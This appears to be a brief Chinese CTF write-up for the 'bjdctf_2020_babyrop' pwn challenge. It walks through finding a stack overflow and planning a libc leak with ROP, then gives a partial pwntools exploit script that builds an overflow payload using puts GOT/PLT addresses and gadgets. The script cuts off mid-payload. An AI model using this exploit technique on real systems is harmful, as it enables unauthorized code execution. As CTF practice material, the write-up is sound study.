bjdctf_2020_babyrop
先checksec
打开ida正常查看函数
打开init函数发现puts函数
然后进入vuln函数 存在栈溢出
没有看到后门函数应该是libc leak+rop
代码如下
from pwn import*
from LibcSearcher import*
p=remote('node3.buuoj.cn',29901)
#p=process('')
elf=ELF('bjdctf_2020_babyrop')
puts_got=elf.got['puts']
puts_plt=elf.plt['puts']
pop_rdi=0x400733
pop_rsi=0x400731
main=0x4006ad
payload='a'*0x28+p64(pop_rdi)+p64(puts_got)+p64(puts_plt)+p64